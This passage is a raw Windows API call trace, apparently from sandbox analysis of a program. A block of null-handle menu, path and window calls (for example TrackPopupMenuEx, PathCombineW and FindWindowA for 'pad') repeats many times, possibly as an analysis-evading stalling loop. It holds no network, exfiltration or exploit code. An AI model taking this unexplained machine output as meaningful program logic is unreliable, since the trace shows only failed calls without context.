0xffffffff [0100.695] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.695] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.695] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.695] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.695] GetStockObject (i=6) returned 0x1b00018 [0100.695] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.695] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.695] PathFileExistsW (pszPath=0x0) returned 0 [0100.695] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.695] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.695] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.695] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.695] GetMenu (hWnd=0x0) returned 0x0 [0100.695] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.695] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.695] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.695] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.695] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.695] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.695] GetStockObject (i=6) returned 0x1b00018 [0100.695] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.695] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.695] PathFileExistsW (pszPath=0x0) returned 0 [0100.695] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.695] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.695] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.695] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.695] GetMenu (hWnd=0x0) returned 0x0 [0100.695] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.695] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.695] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.695] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.695] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.695] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.696] GetStockObject (i=6) returned 0x1b00018 [0100.696] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.696] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.696] PathFileExistsW (pszPath=0x0) returned 0 [0100.696] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.696] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.696] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.696] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.696] GetMenu (hWnd=0x0) returned 0x0 [0100.696] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xe7) returned -1 [0100.696] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.696] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.696] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.696] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.696] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.696] GetStockObject (i=6) returned 0x1b00018 [0100.696] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.696] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.696] PathFileExistsW (pszPath=0x0) returned 0 [0100.696] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.696] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.696] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.696] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.696] GetMenu (hWnd=0x0) returned 0x0 [0100.696] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.696] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.696] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.696] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.696] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.696] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.696] GetStockObject (i=6) returned 0x1b00018 [0100.696] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.696] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.696] PathFileExistsW (pszPath=0x0) returned 0 [0100.696] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.697] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.697] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.697] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.697] GetMenu (hWnd=0x0) returned 0x0 [0100.697] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.697] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.697] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.697] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.697] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.697] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.697] GetStockObject (i=6) returned 0x1b00018 [0100.697] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.697] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.697] PathFileExistsW (pszPath=0x0) returned 0 [0100.697] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.697] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.697] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.697] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.697] GetMenu (hWnd=0x0) returned 0x0 [0100.697] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.697] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.697] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.697] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.697] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.697] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.697] GetStockObject (i=6) returned 0x1b00018 [0100.697] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.697] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.697] PathFileExistsW (pszPath=0x0) returned 0 [0100.697] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.697] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.697] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.697] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.697] GetMenu (hWnd=0x0) returned 0x0 [0100.697] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.698] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.698] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.698] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.698] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.698] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.698] GetStockObject (i=6) returned 0x1b00018 [0100.698] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.698] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.698] PathFileExistsW (pszPath=0x0) returned 0 [0100.698] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.698] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.698] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.698] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.698] GetMenu (hWnd=0x0) returned 0x0 [0100.698] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2da) returned -1 [0100.698] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.698] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.698] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.698] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.698] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.698] GetStockObject (i=6) returned 0x1b00018 [0100.698] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.698] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.698] PathFileExistsW (pszPath=0x0) returned 0 [0100.698] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.698] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.698] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.698] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.698] GetMenu (hWnd=0x0) returned 0x0 [0100.698] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.698] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.698] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.698] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.698] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.698] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.698] GetStockObject (i=6) returned 0x1b00018 [0100.699] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.699] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.699] PathFileExistsW (pszPath=0x0) returned 0 [0100.699] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.699] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.699] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.699] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.699] GetMenu (hWnd=0x0) returned 0x0 [0100.699] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.699] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.699] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.699] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.699] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.699] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.699] GetStockObject (i=6) returned 0x1b00018 [0100.699] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.699] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.699] PathFileExistsW (pszPath=0x0) returned 0 [0100.699] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.699] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.699] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.699] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.699] GetMenu (hWnd=0x0) returned 0x0 [0100.699] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.699] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.699] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.699] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.699] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.699] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.699] GetStockObject (i=6) returned 0x1b00018 [0100.699] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.699] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.699] PathFileExistsW (pszPath=0x0) returned 0 [0100.699] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.699] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.699] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.699] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.700] GetMenu (hWnd=0x0) returned 0x0 [0100.700] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.700] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.700] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.700] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.700] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.700] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.700] GetStockObject (i=6) returned 0x1b00018 [0100.700] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.700] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.700] PathFileExistsW (pszPath=0x0) returned 0 [0100.700] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.700] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.700] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.700] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.700] GetMenu (hWnd=0x0) returned 0x0 [0100.700] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x24c) returned -1 [0100.700] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.700] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.700] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.700] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.700] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.700] GetStockObject (i=6) returned 0x1b00018 [0100.700] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.700] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.700] PathFileExistsW (pszPath=0x0) returned 0 [0100.700] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.700] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.700] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.700] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.700] GetMenu (hWnd=0x0) returned 0x0 [0100.700] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.700] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.700] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.700] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.700] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.701] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.701] GetStockObject (i=6) returned 0x1b00018 [0100.701] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.701] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.701] PathFileExistsW (pszPath=0x0) returned 0 [0100.701] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.701] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.701] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.701] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.701] GetMenu (hWnd=0x0) returned 0x0 [0100.701] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.701] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.701] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.701] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.701] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.701] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.701] GetStockObject (i=6) returned 0x1b00018 [0100.701] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.701] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.701] PathFileExistsW (pszPath=0x0) returned 0 [0100.701] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.701] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.701] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.701] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.701] GetMenu (hWnd=0x0) returned 0x0 [0100.701] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.701] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.701] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.701] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.701] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.701] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.701] GetStockObject (i=6) returned 0x1b00018 [0100.701] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.701] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.701] PathFileExistsW (pszPath=0x0) returned 0 [0100.701] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.702] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.702] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.702] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.702] GetMenu (hWnd=0x0) returned 0x0 [0100.702] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.702] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.702] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.702] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.702] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.702] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.702] GetStockObject (i=6) returned 0x1b00018 [0100.702] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.702] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.702] PathFileExistsW (pszPath=0x0) returned 0 [0100.702] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.702] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.702] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.702] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.702] GetMenu (hWnd=0x0) returned 0x0 [0100.702] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3a8) returned -1 [0100.702] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.702] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.702] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.702] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.702] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.702] GetStockObject (i=6) returned 0x1b00018 [0100.702] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.702] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.702] PathFileExistsW (pszPath=0x0) returned 0 [0100.702] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.702] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.702] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.702] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.702] GetMenu (hWnd=0x0) returned 0x0 [0100.702] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.703] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.703] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.703] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.703] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.703] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.703] GetStockObject (i=6) returned 0x1b00018 [0100.703] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.703] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.703] PathFileExistsW (pszPath=0x0) returned 0 [0100.703] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.703] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.703] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.703] ScreenToClient (in: 